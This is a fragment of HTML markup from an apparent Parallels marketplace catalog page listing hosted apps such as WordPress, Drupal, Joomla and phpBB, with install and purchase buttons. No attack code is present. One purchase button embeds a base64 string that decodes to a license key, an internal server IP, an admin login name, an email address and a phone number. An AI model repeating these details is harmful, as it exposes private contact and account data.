<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "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"); apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]})'><img src="http://catalog.marketplace.parallels.com/storage/WordPress.org/WordPress/3.0-5/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]})'>WordPress</a></h4>
<div class="package-description">Easily create or maintain a website or blog</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]})'><img src="http://catalog.marketplace.parallels.com/storage/Pinnacle%20Cart%20Shopping%20Cart%20Software/PinnacleCart/3.7.7-350/www.pinnaclecart.com/undefined/undefined/undefined/resources/images/pinnacle-icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]})'>PinnacleCart</a></h4>
<div class="package-description">None</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "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"); apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]})'><img src="http://catalog.marketplace.parallels.com/storage/drupal.org/Drupal/6.16-3/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]})'>Drupal</a></h4>
<div class="package-description">Publish, manage and organize a wide variety of content on a website</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/pd6fm_box_mp.jpg"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]})'>Parallels Desktop for Mac</a></h4>
<div class="package-description">Seamlessly run Windows applications on your Mac</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "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"); apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/domains-bttn-small.jpg"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]})'>Domain Names</a></h4>
<div class="package-description">Register a new .COM, .NET or .ORG domain name</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "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"); apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]})'><img src="http://catalog.marketplace.parallels.com/storage/www.joomla.org/joomla/1.5.20-2/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]})'>joomla</a></h4>
<div class="package-description">Build website and powerful online applications</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/keepit-box.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]})'>Keepit Online Backup</a></h4>
<div class="package-description">Backup desktop files and documents to the Cloud</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "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"); apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/PPAV-icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]})'>Parallels Premium Anti-Virus</a></h4>
<div class="package-description">Protect your customers&#039; mailboxes against worms, Trojans and other viruses</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDEwLTEwLTIxJTI1M0ElMjUyRm5vbmUlMjUyRlBhcmFsbGVscyUyNTJGUGFyYWxsZWxzJTI1MjUyMFByZW1pdW0lMjUyNTIwQW50aS1WaXJ1cyUyNTJGMS0xJTI1MkZQYXJhbGxlbHMlMjUyRnVuZGVmaW5lZCUyNTJGdW5kZWZpbmVkJTI1MkZ1bmRlZmluZWQlMjZkZXRhaWxzJTI1NUJhcHBJZCUyNTVEJTNEaHR0cCUyNTNBJTI1MkYlMjUyRnd3dy5wYXJhbGxlbHMuY29tJTI1MkZzdG9yZSUyNTJGcHJlbWl1bWFudGl2aXJ1cyUyNTJGJTI2ZGV0YWlscyUyNTVCbmFtZSUyNTVEJTNEUGFyYWxsZWxzJTJCUHJlbWl1bSUyQkFudGktVmlydXMlMjZkZXRhaWxzJTI1NUJ2ZXJzaW9uJTI1NUQlM0QxJTI2ZGV0YWlscyUyNTVCcmVsZWFzZSUyNTVEJTNEMSUyNmRldGFpbHMlMjU1QnZlbmRvciUyNTVEJTNEUGFyYWxsZWxzJTI2ZGV0YWlscyUyNTVCcGFja2FnZXIlMjU1RCUzRFBhcmFsbGVscyUyNmRldGFpbHMlMjU1QmlzQXBzJTI1NUQlM0QwJTI2ZGV0YWlscyUyNTVCcGFja2FnZVVybCUyNTVEJTNEJk9wZXJhdGlvbklEPVBVUkNIQVNFX0FQUExJQ0FUSU9OX0xJQ0VOU0UmYXBwX3ZlbmRvcl9uYW1lPVBhcmFsbGVscyZhcHBfbmFtZT1QYXJhbGxlbHMrUHJlbWl1bStBbnRpLVZpcnVzJmFwcF92ZXJzaW9uPTEmYXBwX3JlbGVhc2U9M
SZhcHBfZ3VpZD1odHRwJTNBJTJGJTJGd3d3LnBhcmFsbGVscy5jb20lMkZzdG9yZSUyRnByZW1pdW1hbnRpdmlydXMlMkYm"); apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]})'><img src="http://catalog.marketplace.parallels.com/storage/www.phpbb.com/phpBB/3.0.4-4/parallels.com/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]})'>phpBB</a></h4>
<div class="package-description">Create a web forum or bulletin board in minutes</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]})'><img src="http://catalog.marketplace.parallels.com/storage/gallery.menalto.com/gallery/2.3.1-4/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]})'>gallery</a></h4>
<div class="package-description">Quickly organize your photos online</div>
</div>
</div>
<div class="package-actions">
